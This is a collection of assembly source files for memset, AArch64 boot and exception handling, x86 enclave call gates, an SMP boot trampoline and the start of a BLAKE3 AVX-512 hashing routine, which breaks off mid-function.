// applications (crt/*, ldso/dlstart.c, and arch/* /crt_arch.h) to omit
// the copyright notice and permission notice otherwise required by the
// license, and to use these files without any requirement of
// attribution. These files include substantial contributions from:
//
// Bobby Bingham
// John Spencer
// Nicholas J. Kain
// Rich Felker
// Richard Pennington
// Stefan Kristiansson
// Szabolcs Nagy
//
// all of whom have explicitly granted such permission.
//
// This file previously contained text expressing a belief that most of
// the files covered by the above exception were sufficiently trivial not
// to be subject to copyright, resulting in confusion over whether it
// negated the permissions granted in the license. In the spirit of
// permissive licensing, and of not having licensing issues being an
// obstacle to adoption, that text has been removed.
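//
// For orientation, a minimal C sketch of the strategy the compiled output
// below implements (a paraphrase, not the verbatim musl source):
//
//   #include <stddef.h>
//   #include <stdint.h>
//
//   void *memset_sketch(void *dest, int c, size_t n) {
//       unsigned char *s = dest;
//       if (n == 0) return dest;
//       // Overlapping head/tail byte stores handle every n < 9.
//       s[0] = s[n - 1] = (unsigned char)c;
//       if (n < 3) return dest;
//       s[1] = s[2] = s[n - 2] = s[n - 3] = (unsigned char)c;
//       if (n < 7) return dest;
//       s[3] = s[n - 4] = (unsigned char)c;
//       if (n < 9) return dest;
//       // Word-align the cursor, then fill with a replicated word.
//       size_t k = -(uintptr_t)s & 3;
//       s += k; n -= k; n &= (size_t)-4;
//       uint32_t w = (uint32_t)(unsigned char)c * 0x01010101u;
//       for (uint32_t *p = (uint32_t *)s; n >= 4; n -= 4)
//           *p++ = w;
//       return dest;
//   }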
.text
.attribute 4, 16
.attribute 5, "rv32im"
.file "musl_memset.c"
.globl memset
.p2align 2
.type memset,@function
memset:
beqz a2, .LBB0_9memset
sb a1, 0(a0)
add a3, a2, a0
li a4, 3
sb a1, -1(a3)
bltu a2, a4, .LBB0_9memset
sb a1, 1(a0)
sb a1, 2(a0)
sb a1, -2(a3)
li a4, 7
sb a1, -3(a3)
bltu a2, a4, .LBB0_9memset
sb a1, 3(a0)
li a5, 9
sb a1, -4(a3)
bltu a2, a5, .LBB0_9memset
neg a3, a0 // a3 = -dest
andi a4, a3, 3 // bytes needed to reach 4-byte alignment
add a3, a0, a4 // a3 = word-aligned cursor
sub a2, a2, a4
andi a2, a2, -4 // round remaining length down to a word multiple
andi a1, a1, 255
lui a4, 4112 // a4 = 0x01010000
addi a4, a4, 257 // a4 = 0x01010101
mul a1, a1, a4 // replicate the fill byte into all four byte lanes
sw a1, 0(a3)
add a4, a3, a2
sw a1, -4(a4)
bltu a2, a5, .LBB0_9memset
sw a1, 4(a3)
sw a1, 8(a3)
sw a1, -12(a4)
li a5, 25
sw a1, -8(a4)
bltu a2, a5, .LBB0_9memset
sw a1, 12(a3)
sw a1, 16(a3)
sw a1, 20(a3)
sw a1, 24(a3)
sw a1, -28(a4)
sw a1, -24(a4)
sw a1, -20(a4)
andi a5, a3, 4
ori a5, a5, 24
sub a2, a2, a5
li a6, 32
sw a1, -16(a4)
bltu a2, a6, .LBB0_9memset
add a3, a3, a5
li a4, 31
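// Main loop: store 32 bytes (eight words) per iteration while more than
// 31 bytes remain.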
.LBB0_8memset:
sw a1, 0(a3)
sw a1, 4(a3)
sw a1, 8(a3)
sw a1, 12(a3)
sw a1, 16(a3)
sw a1, 20(a3)
sw a1, 24(a3)
sw a1, 28(a3)
addi a2, a2, -32
addi a3, a3, 32
bltu a4, a2, .LBB0_8memset
.LBB0_9memset:
ret
.Lfunc_end0memset:
.size memset, .Lfunc_end0memset-memset
.ident "Ubuntu clang version 14.0.6-++20220622053131+f28c006a5895-1~exp1~20220622173215.157"
.section ".note.GNU-stack","",@progbits
.addrsig |
MissBiwott25/comprehensive-rust. | 4,676 | src/bare-metal/aps/examples/src/exceptions.S | /*
* Copyright 2023 Google LLC
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* https://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
/**
* Saves the volatile registers onto the stack. This currently takes
* 14 instructions, so it can be used in exception handlers with 18
* instructions left.
*
 * On return, x0 and x1 are initialised to elr_el1 and spsr_el1
 * respectively, which can be used as the first and second arguments
 * of a subsequent call.
*/
.macro save_volatile_to_stack
/* Reserve stack space and save registers x0-x18, x29 & x30. */
stp x0, x1, [sp, #-(8 * 24)]!
stp x2, x3, [sp, #8 * 2]
stp x4, x5, [sp, #8 * 4]
stp x6, x7, [sp, #8 * 6]
stp x8, x9, [sp, #8 * 8]
stp x10, x11, [sp, #8 * 10]
stp x12, x13, [sp, #8 * 12]
stp x14, x15, [sp, #8 * 14]
stp x16, x17, [sp, #8 * 16]
str x18, [sp, #8 * 18]
stp x29, x30, [sp, #8 * 20]
/*
 * Save elr_el1 & spsr_el1 so that we can take a nested exception
 * and still be able to unwind afterwards.
*/
mrs x0, elr_el1
mrs x1, spsr_el1
stp x0, x1, [sp, #8 * 22]
.endm
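/*
 * Resulting stack frame, inferred from the stores above (24 slots of
 * 8 bytes, keeping sp 16-byte aligned):
 *
 *   sp + 8*0  .. 8*17  x0-x17 (in pairs)
 *   sp + 8*18          x18 (slot 8*19 is unused padding)
 *   sp + 8*20 .. 8*21  x29, x30
 *   sp + 8*22 .. 8*23  elr_el1, spsr_el1
 */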
/**
* Restores the volatile registers from the stack. This currently
* takes 14 instructions, so it can be used in exception handlers
 * with 18 instructions to spare; if paired with
 * save_volatile_to_stack, 4 of those instructions remain unused.
*/
.macro restore_volatile_from_stack
/* Restore registers x2-x18, x29 & x30. */
ldp x2, x3, [sp, #8 * 2]
ldp x4, x5, [sp, #8 * 4]
ldp x6, x7, [sp, #8 * 6]
ldp x8, x9, [sp, #8 * 8]
ldp x10, x11, [sp, #8 * 10]
ldp x12, x13, [sp, #8 * 12]
ldp x14, x15, [sp, #8 * 14]
ldp x16, x17, [sp, #8 * 16]
ldr x18, [sp, #8 * 18]
ldp x29, x30, [sp, #8 * 20]
/*
* Restore registers elr_el1 & spsr_el1, using x0 & x1 as scratch.
*/
ldp x0, x1, [sp, #8 * 22]
msr elr_el1, x0
msr spsr_el1, x1
/* Restore x0 & x1, and release stack space. */
ldp x0, x1, [sp], #8 * 24
.endm
/**
* This is a generic handler for exceptions taken at the current EL
* while using SP0. It behaves similarly to the SPx case by first
* switching to SPx, doing the work, then switching back to SP0 before
* returning.
*
* Switching to SPx and calling the Rust handler takes 16
* instructions. To restore and return we need an additional 16
* instructions, so we can implement the whole handler within the
* allotted 32 instructions.
*
*/
.macro current_exception_sp0 handler:req
msr spsel, #1
save_volatile_to_stack
bl \handler
restore_volatile_from_stack
msr spsel, #0
eret
.endm
/**
* This is a generic handler for exceptions taken at the current EL
* while using SPx. It saves volatile registers, calls the Rust
* handler, restores volatile registers, then returns.
*
* This also works for exceptions taken from EL0, if we don't care
* about non-volatile registers.
*
* Saving state and jumping to the Rust handler takes 15 instructions,
* and restoring and returning also takes 15 instructions, so we can
* fit the whole handler in 30 instructions, under the limit of 32.
*/
.macro current_exception_spx handler:req
save_volatile_to_stack
bl \handler
restore_volatile_from_stack
eret
.endm
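/*
 * Why the instruction budgets quoted above matter: the vector table
 * below spaces its 16 entries 0x80 bytes apart, and AArch64
 * instructions are 4 bytes each, so each entry holds at most
 * 0x80 / 4 = 32 instructions. The SP0 handler uses exactly
 * 16 + 16 = 32 of them; the SPx handler uses 15 + 15 = 30.
 */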
.section .text.vector_table_el1, "ax"
.global vector_table_el1
.balign 0x800
vector_table_el1:
sync_cur_sp0:
current_exception_sp0 sync_exception_current
.balign 0x80
irq_cur_sp0:
current_exception_sp0 irq_current
.balign 0x80
fiq_cur_sp0:
current_exception_sp0 fiq_current
.balign 0x80
serr_cur_sp0:
current_exception_sp0 serr_current
.balign 0x80
sync_cur_spx:
current_exception_spx sync_exception_current
.balign 0x80
irq_cur_spx:
current_exception_spx irq_current
.balign 0x80
fiq_cur_spx:
current_exception_spx fiq_current
.balign 0x80
serr_cur_spx:
current_exception_spx serr_current
.balign 0x80
sync_lower_64:
current_exception_spx sync_lower
.balign 0x80
irq_lower_64:
current_exception_spx irq_lower
.balign 0x80
fiq_lower_64:
current_exception_spx fiq_lower
.balign 0x80
serr_lower_64:
current_exception_spx serr_lower
.balign 0x80
sync_lower_32:
current_exception_spx sync_lower
.balign 0x80
irq_lower_32:
current_exception_spx irq_lower
.balign 0x80
fiq_lower_32:
current_exception_spx fiq_lower
.balign 0x80
serr_lower_32:
current_exception_spx serr_lower
|
MissBiwott25/comprehensive-rust. | 1,445 | src/bare-metal/aps/examples/src/idmap.S | /*
* Copyright 2023 Google LLC
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* https://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
.set .L_TT_TYPE_BLOCK, 0x1
.set .L_TT_TYPE_PAGE, 0x3
.set .L_TT_TYPE_TABLE, 0x3
/* Access flag. */
.set .L_TT_AF, 0x1 << 10
/* Not global. */
.set .L_TT_NG, 0x1 << 11
.set .L_TT_XN, 0x3 << 53
.set .L_TT_MT_DEV, 0x0 << 2 // MAIR #0 (DEV_nGnRE)
.set .L_TT_MT_MEM, (0x1 << 2) | (0x3 << 8) // MAIR #1 (MEM_WBWA), inner shareable
.set .L_BLOCK_DEV, .L_TT_TYPE_BLOCK | .L_TT_MT_DEV | .L_TT_AF | .L_TT_XN
.set .L_BLOCK_MEM, .L_TT_TYPE_BLOCK | .L_TT_MT_MEM | .L_TT_AF | .L_TT_NG
.section ".rodata.idmap", "a", %progbits
.global idmap
.align 12
idmap:
/* level 1 */
.quad .L_BLOCK_DEV | 0x0 // 1 GiB of device mappings
.quad .L_BLOCK_MEM | 0x40000000 // 1 GiB of DRAM
.fill 254, 8, 0x0 // 254 GiB of unmapped VA space
.quad .L_BLOCK_DEV | 0x4000000000 // 1 GiB of device mappings
.fill 255, 8, 0x0 // 255 GiB of remaining VA space
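/*
 * Indexing check: with 4 KiB granules each level-1 entry covers
 * 2^30 bytes, so entry n maps VA [n << 30, (n + 1) << 30). Entry 0 is
 * the device block at PA 0x0, entry 1 the DRAM block at PA 0x40000000,
 * and entry 256 (after the 254-entry gap) the device block at
 * PA 256 GiB = 0x4000000000.
 */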
|
MissBiwott25/comprehensive-rust. | 4,768 | src/bare-metal/aps/examples/src/entry.S | /*
* Copyright 2023 Google LLC
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* https://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
.macro adr_l, reg:req, sym:req
adrp \reg, \sym
add \reg, \reg, :lo12:\sym
.endm
.macro mov_i, reg:req, imm:req
movz \reg, :abs_g3:\imm
movk \reg, :abs_g2_nc:\imm
movk \reg, :abs_g1_nc:\imm
movk \reg, :abs_g0_nc:\imm
.endm
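/*
 * Worked example: mov_i x0, 0x1122334455667788 expands to
 *   movz x0, #0x1122, lsl #48
 *   movk x0, #0x3344, lsl #32
 *   movk x0, #0x5566, lsl #16
 *   movk x0, #0x7788
 * i.e. :abs_g3: through :abs_g0_nc: pick out the four 16-bit chunks of
 * the absolute value, most significant first.
 */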
.set .L_MAIR_DEV_nGnRE, 0x04
.set .L_MAIR_MEM_WBWA, 0xff
.set .Lmairval, .L_MAIR_DEV_nGnRE | (.L_MAIR_MEM_WBWA << 8)
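/* Evaluated: .Lmairval == 0xff04 (attr0 = Device-nGnRE, attr1 = Normal WBWA). */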
/* 4 KiB granule size for TTBR0_EL1. */
.set .L_TCR_TG0_4KB, 0x0 << 14
/* 4 KiB granule size for TTBR1_EL1. */
.set .L_TCR_TG1_4KB, 0x2 << 30
/*
* Disable translation table walk for TTBR1_EL1, generating a
* translation fault instead.
*/
.set .L_TCR_EPD1, 0x1 << 23
/* Translation table walks for TTBR0_EL1 are inner sharable. */
.set .L_TCR_SH_INNER, 0x3 << 12
/*
* Translation table walks for TTBR0_EL1 are outer write-back
* read-allocate write-allocate cacheable.
*/
.set .L_TCR_RGN_OWB, 0x1 << 10
/*
* Translation table walks for TTBR0_EL1 are inner write-back
* read-allocate write-allocate cacheable.
*/
.set .L_TCR_RGN_IWB, 0x1 << 8
/* Size offset for TTBR0_EL1 is 2**39 bytes (512 GiB). */
.set .L_TCR_T0SZ_512, 64 - 39
.set .Ltcrval, .L_TCR_TG0_4KB | .L_TCR_TG1_4KB | .L_TCR_EPD1 | .L_TCR_RGN_OWB
.set .Ltcrval, .Ltcrval | .L_TCR_RGN_IWB | .L_TCR_SH_INNER | .L_TCR_T0SZ_512
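/*
 * Evaluated: .Ltcrval == 0x80803519 (TG1 0x80000000 | EPD1 0x800000 |
 * SH 0x3000 | ORGN 0x400 | IRGN 0x100 | T0SZ 25); the IPS field is
 * merged in at runtime below.
 */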
/* Stage 1 instruction access cacheability is unaffected. */
.set .L_SCTLR_ELx_I, 0x1 << 12
/* SP alignment fault if SP is not aligned to a 16 byte boundary. */
.set .L_SCTLR_ELx_SA, 0x1 << 3
/* Stage 1 data access cacheability is unaffected. */
.set .L_SCTLR_ELx_C, 0x1 << 2
/* EL0 and EL1 stage 1 MMU enabled. */
.set .L_SCTLR_ELx_M, 0x1 << 0
/*
* Privileged Access Never is unchanged on taking an exception to EL1.
*/
.set .L_SCTLR_EL1_SPAN, 0x1 << 23
/* SETEND instruction disabled at EL0 in aarch32 mode. */
.set .L_SCTLR_EL1_SED, 0x1 << 8
/* Various IT instructions are disabled at EL0 in aarch32 mode. */
.set .L_SCTLR_EL1_ITD, 0x1 << 7
.set .L_SCTLR_EL1_RES1, (0x1 << 11) | (0x1 << 20) | (0x1 << 22) | (0x1 << 28) | (0x1 << 29)
.set .Lsctlrval, .L_SCTLR_ELx_M | .L_SCTLR_ELx_C | .L_SCTLR_ELx_SA | .L_SCTLR_EL1_ITD | .L_SCTLR_EL1_SED
.set .Lsctlrval, .Lsctlrval | .L_SCTLR_ELx_I | .L_SCTLR_EL1_SPAN | .L_SCTLR_EL1_RES1
// ANCHOR: entry
/**
* This is a generic entry point for an image. It carries out the
* operations required to prepare the loaded image to be run.
* Specifically, it
*
* - sets up the MMU with an identity map of virtual to physical
* addresses, and enables caching
* - enables floating point
 * - zeroes the bss section, using x29 and x30 as scratch registers
* - prepares the stack, pointing to a section within the image
* - sets up the exception vector
* - branches to the Rust `main` function
*
* It preserves x0-x3 for the Rust entry point, as these may contain
* boot parameters.
*/
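/*
 * Viewed from C, the hand-off at the end behaves roughly like the call
 * below (a hedged sketch; the real Rust signature lives in the
 * accompanying crate and is not reproduced here):
 *
 *   void main(uint64_t x0, uint64_t x1, uint64_t x2, uint64_t x3);
 */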
.section .init.entry, "ax"
.global entry
entry:
/*
* Load and apply the memory management configuration, ready to
* enable MMU and caches.
*/
adrp x30, idmap
msr ttbr0_el1, x30
mov_i x30, .Lmairval
msr mair_el1, x30
mov_i x30, .Ltcrval
/* Copy the supported PA range into TCR_EL1.IPS. */
mrs x29, id_aa64mmfr0_el1
bfi x30, x29, #32, #4
msr tcr_el1, x30
mov_i x30, .Lsctlrval
/*
* Ensure everything before this point has completed, then
* invalidate any potentially stale local TLB entries before they
* start being used.
*/
isb
tlbi vmalle1
ic iallu
dsb nsh
isb
/*
* Configure sctlr_el1 to enable MMU and cache and don't proceed
* until this has completed.
*/
msr sctlr_el1, x30
isb
/* Disable trapping floating point access in EL1. */
mrs x30, cpacr_el1
orr x30, x30, #(0x3 << 20)
msr cpacr_el1, x30
isb
/* Zero out the bss section. */
adr_l x29, bss_begin
adr_l x30, bss_end
0: cmp x29, x30
b.hs 1f
stp xzr, xzr, [x29], #16
b 0b
1: /* Prepare the stack. */
adr_l x30, boot_stack_end
mov sp, x30
/* Set up exception vector. */
adr x30, vector_table_el1
msr vbar_el1, x30
/* Call into Rust code. */
bl main
/* Loop forever waiting for interrupts. */
2: wfi
b 2b
|
mit-enclaves/argos-monitor | 1,088 | crates/bricks/src/x86_64/entry.S | .text
// Take a capa_index_t* and a void**, expected to be in rdi, rsi.
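// Seen from C, this behaves roughly like (a hedged sketch; the real
// declaration lives in the calling code, not in this file):
//
//   uint64_t asm_call_gate(capa_index_t *capa, void **args);
//
// Both pointees are rewritten with the values the vmcall returns in
// rdi/rsi, and rax is passed through untouched as the result.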
.globl asm_call_gate
asm_call_gate:
pushq %rbp
pushq %rbx
pushq %rcx
pushq %rdx
pushq %r10
pushq %r11
pushq %r12
pushq %r13
pushq %r14
pushq %r15
pushfq
// Now do the call, arguments are in the right registers.
pushq %rdi
pushq %rsi
movq (%rdi), %rdi
movq (%rsi), %rsi
movq $9, %rax // TYCHE_SWITCH
vmcall
// We returned, move the return values into the registers.
popq %r15 // &rsi, i.e., void**
movq %rsi, (%r15)
popq %r15 // &rdi, i.e., capa_index_t*
movq %rdi, (%r15)
// Restore all registers, don't change rax.
popfq
popq %r15
popq %r14
popq %r13
popq %r12
popq %r11
popq %r10
popq %rdx
popq %rcx
popq %rbx
popq %rbp
ret
.globl bricks_start
bricks_start:
movq %r11, %rsi
// Aligning the stack to 16 bytes, had bug with xmm registers
andl $-16, %esp
callq bricks_trusted_main
// Should never return here, call exit if we do.
movq $1, %rax
vmcall
|
mit-enclaves/argos-monitor | 3,305 | monitor/first-stage/src/smp/trampoline.S | # Upon receiving a SIPI from BSP, the AP starts in real mode with CS:IP set to XY00:0000.
# The assembly here tries to enter long mode directly from real mode (skipping protected mode)
#
# Useful links:
# - https://wiki.osdev.org/Symmetric_Multiprocessing#AP_Initialization_Code
# - https://wiki.osdev.org/Entering_Long_Mode_Directly
# - https://stackoverflow.com/questions/36968829/how-to-switch-from-real-mode-to-protected-mode-after-bootloader
# Special thanks to: https://github.com/rcore-os/x86-smpboot
.equ start_addr, 0x7000
.equ ap_trampoline64_start_paddr, start_addr + ap_trampoline64_start - ap_trampoline_start
.equ gdt_64_paddr, start_addr + gdt_64 - ap_trampoline_start
.equ gdt_64_ptr_paddr, start_addr + gdt_64_ptr - ap_trampoline_start
.equ CR0_PE, (1 << 0)
.equ CR0_PG, (1 << 31)
.equ CR4_PAE, (1 << 5)
.equ CR4_PGE, (1 << 7)
.equ EFER_LME, (1 << 8)
.equ EFER_NXE, (1 << 11)
.equ EFER_SCE, (1 << 0)
.global ap_trampoline_start
.global ap_trampoline_end
.equ cr3_ptr, start_addr + 0x0ff8
.equ entry_ptr, start_addr + 0x0ff0
.equ stack_ptr, start_addr + 0x0fe8
.equ temp_stack_ptr, start_addr + 0x0fe0
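# Mailbox the BSP must populate before sending the SIPI (layout inferred
# from the .equ definitions above), as a C sketch:
#
#   struct ap_mailbox {              // lives at start_addr + 0x0fe0
#       uint64_t temp_stack_ptr;     // +0x00: scratch stack for the mode switch
#       uint64_t stack_ptr;          // +0x08: stack for the entry function
#       uint64_t entry_ptr;          // +0x10: 64-bit entry function to call
#       uint64_t cr3_ptr;            // +0x18: page-table root to load
#   };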
.text
.code16 # 16-bit mode
ap_trampoline_start:
# disable BIOS enabled interrupts
cli
# write back and invalidate cache
wbinvd
# zero out data segment registers DS, ES, and SS
xor ax, ax # ax
mov ds, ax # data segment
mov es, ax # extra segment
mov ss, ax # stack segment
# load idt with 0, 0 so that any NMI will cause a triple fault
# mov eax, idt_zero
# lidt [eax]
# cr4: enable PAE and PGE (0xa0)
mov eax, cr4
or eax, 0xa0
mov cr4, eax
# load cr3
mov eax, cr3_ptr
mov eax, [eax]
mov cr3, eax
# EFER: enable LME, NXE and SCE
mov ecx, 0xC0000080
rdmsr
or eax, EFER_LME | EFER_NXE | EFER_SCE
wrmsr
# cr0: enable PE and PG (CR0_PE | CR0_PG)
mov eax, 1
shl eax, 31
or eax, 1
mov ebx, cr0
or ebx, eax
mov cr0, ebx
# lgdt: load 64-bit GDT
lgdt [gdt_64_ptr_paddr]
# esp: point to temporary stack
mov esp, temp_stack_ptr
# jump to long mode directly
push 0x8
lea eax, [ap_trampoline64_start_paddr]
push eax
retf
.code64
ap_trampoline64_start:
# zero out the segment registers DS, ES, FS, GS and SS
xor ax, ax
mov ds, ax
mov es, ax
mov fs, ax
mov gs, ax
mov ss, ax
# enter the entry function
mov rsp, [stack_ptr]
mov rax, [entry_ptr]
call rax
spin_hlt:
hlt
jmp spin_hlt
gdt_64:
.quad 0x0000000000000000 # NULL-segment descriptor (mandatory)
.quad 0x00209A0000000000    # Code segment descriptor (64-bit, L bit set; targeted by the far return into long mode)
.quad 0x0000920000000000    # Data segment descriptor (used to access data in memory once in long mode)
.align 4
.word 0 # Padding to make the address of the GDT aligned on a 4-byte boundary
gdt_64_ptr:
.word gdt_64_ptr - gdt_64 - 1 # 16-bit Size (Limit) of GDT.
.long gdt_64_paddr # 32-bit Base Address of GDT. (CPU will zero extend to 64-bit)
ap_trampoline_end:
|
mit-enclaves/argos-monitor | 1,061 | C/libraries/sdktyche/runtime/asm.S | #if defined CONFIG_X86 || defined(__x86_64__)
.text
// Take a capa_index_t* and a void**, expected to be in rdi, rsi.
.globl asm_call_gate
asm_call_gate:
pushq %rbp
pushq %rbx
pushq %rcx
pushq %rdx
pushq %r10
pushq %r11
pushq %r12
pushq %r13
pushq %r14
pushq %r15
pushfq
// Now do the call, arguments are in the right registers.
//pushq %rdi
//pushq %rsi
//movq (%rdi), %rdi
//movq (%rsi), %rsi
movq $8, %rax // TYCHE_SWITCH
vmcall
// We returned, move the return values into the registers.
//popq %r15 // &rsi, i.e., void**
//movq %rsi, (%r15)
//popq %r15 // &rdi, i.e., capa_index_t*
//movq %rdi, (%r15)
// Restore all registers, don't change rax.
popfq
popq %r15
popq %r14
popq %r13
popq %r12
popq %r11
popq %r10
popq %rdx
popq %rcx
popq %rbx
popq %rbp
ret
.globl _start
_start:
//movq %r11, %rsi
callq trusted_main
// Should never return here, call exit if we do.
movq $1, %rax
vmcall
#endif
|
mit-enclaves/argos-monitor | 161,672 | C/libraries/sdktyche/loader/blake3_avx512_x86-64_unix.S | #if defined(__ELF__) && defined(__linux__)
.section .note.GNU-stack,"",%progbits
#endif
#if defined(__ELF__) && defined(__CET__) && defined(__has_include)
#if __has_include(<cet.h>)
#include <cet.h>
#endif
#endif
#if !defined(_CET_ENDBR)
#define _CET_ENDBR
#endif
.intel_syntax noprefix
.global _blake3_hash_many_avx512
.global blake3_hash_many_avx512
.global blake3_compress_in_place_avx512
.global _blake3_compress_in_place_avx512
.global blake3_compress_xof_avx512
.global _blake3_compress_xof_avx512
.global blake3_xof_many_avx512
.global _blake3_xof_many_avx512
#ifdef __APPLE__
.text
#else
.section .text
#endif
.p2align 6
_blake3_hash_many_avx512:
blake3_hash_many_avx512:
_CET_ENDBR
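# The C dispatch layer in the upstream BLAKE3 sources declares this
# routine approximately as follows (a sketch for orientation, not
# authoritative):
#
#   void blake3_hash_many_avx512(const uint8_t *const *inputs,
#                                size_t num_inputs, size_t blocks,
#                                const uint32_t key[8], uint64_t counter,
#                                bool increment_counter, uint8_t flags,
#                                uint8_t flags_start, uint8_t flags_end,
#                                uint8_t *out);
#
# rdi..r9 carry the first six arguments per the SysV ABI; the remaining
# four arrive on the stack and are read below at rbp+0x38, +0x40, +0x48
# and +0x50.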
push r15
push r14
push r13
push r12
push rbx
push rbp
mov rbp, rsp
sub rsp, 144
and rsp, 0xFFFFFFFFFFFFFFC0
neg r9
kmovw k1, r9d
vmovd xmm0, r8d
vpbroadcastd ymm0, xmm0
shr r8, 32
vmovd xmm1, r8d
vpbroadcastd ymm1, xmm1
vmovdqa ymm4, ymm1
vmovdqa ymm5, ymm1
vpaddd ymm2, ymm0, ymmword ptr [ADD0+rip]
vpaddd ymm3, ymm0, ymmword ptr [ADD0+32+rip]
vpcmpltud k2, ymm2, ymm0
vpcmpltud k3, ymm3, ymm0
vpaddd ymm4 {k2}, ymm4, dword ptr [ADD1+rip] {1to8}
vpaddd ymm5 {k3}, ymm5, dword ptr [ADD1+rip] {1to8}
knotw k2, k1
vmovdqa32 ymm2 {k2}, ymm0
vmovdqa32 ymm3 {k2}, ymm0
vmovdqa32 ymm4 {k2}, ymm1
vmovdqa32 ymm5 {k2}, ymm1
vmovdqa ymmword ptr [rsp], ymm2
vmovdqa ymmword ptr [rsp+0x1*0x20], ymm3
vmovdqa ymmword ptr [rsp+0x2*0x20], ymm4
vmovdqa ymmword ptr [rsp+0x3*0x20], ymm5
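# The sequence above builds each lane's 64-bit block counter: the low
# words get counter + i (i = 0..15), vpcmpltud flags lanes that wrapped
# so a carry is added to the high words, and lanes masked off by k1
# (increment_counter false) keep the original counter. The four halves
# are parked at [rsp]..[rsp+0x7f] for the rounds below.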
shl rdx, 6
mov qword ptr [rsp+0x80], rdx
cmp rsi, 16
jc 3f
2:
vpbroadcastd zmm0, dword ptr [rcx]
vpbroadcastd zmm1, dword ptr [rcx+0x1*0x4]
vpbroadcastd zmm2, dword ptr [rcx+0x2*0x4]
vpbroadcastd zmm3, dword ptr [rcx+0x3*0x4]
vpbroadcastd zmm4, dword ptr [rcx+0x4*0x4]
vpbroadcastd zmm5, dword ptr [rcx+0x5*0x4]
vpbroadcastd zmm6, dword ptr [rcx+0x6*0x4]
vpbroadcastd zmm7, dword ptr [rcx+0x7*0x4]
movzx eax, byte ptr [rbp+0x38]
movzx ebx, byte ptr [rbp+0x40]
or eax, ebx
xor edx, edx
.p2align 5
9:
movzx ebx, byte ptr [rbp+0x48]
or ebx, eax
add rdx, 64
cmp rdx, qword ptr [rsp+0x80]
cmove eax, ebx
mov dword ptr [rsp+0x88], eax
mov r8, qword ptr [rdi]
mov r9, qword ptr [rdi+0x8]
mov r10, qword ptr [rdi+0x10]
mov r11, qword ptr [rdi+0x18]
mov r12, qword ptr [rdi+0x40]
mov r13, qword ptr [rdi+0x48]
mov r14, qword ptr [rdi+0x50]
mov r15, qword ptr [rdi+0x58]
vmovdqu32 ymm16, ymmword ptr [rdx+r8-0x2*0x20]
vinserti64x4 zmm16, zmm16, ymmword ptr [rdx+r12-0x2*0x20], 0x01
vmovdqu32 ymm17, ymmword ptr [rdx+r9-0x2*0x20]
vinserti64x4 zmm17, zmm17, ymmword ptr [rdx+r13-0x2*0x20], 0x01
vpunpcklqdq zmm8, zmm16, zmm17
vpunpckhqdq zmm9, zmm16, zmm17
vmovdqu32 ymm18, ymmword ptr [rdx+r10-0x2*0x20]
vinserti64x4 zmm18, zmm18, ymmword ptr [rdx+r14-0x2*0x20], 0x01
vmovdqu32 ymm19, ymmword ptr [rdx+r11-0x2*0x20]
vinserti64x4 zmm19, zmm19, ymmword ptr [rdx+r15-0x2*0x20], 0x01
vpunpcklqdq zmm10, zmm18, zmm19
vpunpckhqdq zmm11, zmm18, zmm19
mov r8, qword ptr [rdi+0x20]
mov r9, qword ptr [rdi+0x28]
mov r10, qword ptr [rdi+0x30]
mov r11, qword ptr [rdi+0x38]
mov r12, qword ptr [rdi+0x60]
mov r13, qword ptr [rdi+0x68]
mov r14, qword ptr [rdi+0x70]
mov r15, qword ptr [rdi+0x78]
vmovdqu32 ymm16, ymmword ptr [rdx+r8-0x2*0x20]
vinserti64x4 zmm16, zmm16, ymmword ptr [rdx+r12-0x2*0x20], 0x01
vmovdqu32 ymm17, ymmword ptr [rdx+r9-0x2*0x20]
vinserti64x4 zmm17, zmm17, ymmword ptr [rdx+r13-0x2*0x20], 0x01
vpunpcklqdq zmm12, zmm16, zmm17
vpunpckhqdq zmm13, zmm16, zmm17
vmovdqu32 ymm18, ymmword ptr [rdx+r10-0x2*0x20]
vinserti64x4 zmm18, zmm18, ymmword ptr [rdx+r14-0x2*0x20], 0x01
vmovdqu32 ymm19, ymmword ptr [rdx+r11-0x2*0x20]
vinserti64x4 zmm19, zmm19, ymmword ptr [rdx+r15-0x2*0x20], 0x01
vpunpcklqdq zmm14, zmm18, zmm19
vpunpckhqdq zmm15, zmm18, zmm19
vmovdqa32 zmm27, zmmword ptr [INDEX0+rip]
vmovdqa32 zmm31, zmmword ptr [INDEX1+rip]
vshufps zmm16, zmm8, zmm10, 136
vshufps zmm17, zmm12, zmm14, 136
vmovdqa32 zmm20, zmm16
vpermt2d zmm16, zmm27, zmm17
vpermt2d zmm20, zmm31, zmm17
vshufps zmm17, zmm8, zmm10, 221
vshufps zmm30, zmm12, zmm14, 221
vmovdqa32 zmm21, zmm17
vpermt2d zmm17, zmm27, zmm30
vpermt2d zmm21, zmm31, zmm30
vshufps zmm18, zmm9, zmm11, 136
vshufps zmm8, zmm13, zmm15, 136
vmovdqa32 zmm22, zmm18
vpermt2d zmm18, zmm27, zmm8
vpermt2d zmm22, zmm31, zmm8
vshufps zmm19, zmm9, zmm11, 221
vshufps zmm8, zmm13, zmm15, 221
vmovdqa32 zmm23, zmm19
vpermt2d zmm19, zmm27, zmm8
vpermt2d zmm23, zmm31, zmm8
mov r8, qword ptr [rdi]
mov r9, qword ptr [rdi+0x8]
mov r10, qword ptr [rdi+0x10]
mov r11, qword ptr [rdi+0x18]
mov r12, qword ptr [rdi+0x40]
mov r13, qword ptr [rdi+0x48]
mov r14, qword ptr [rdi+0x50]
mov r15, qword ptr [rdi+0x58]
vmovdqu32 ymm24, ymmword ptr [r8+rdx-0x1*0x20]
vinserti64x4 zmm24, zmm24, ymmword ptr [r12+rdx-0x1*0x20], 0x01
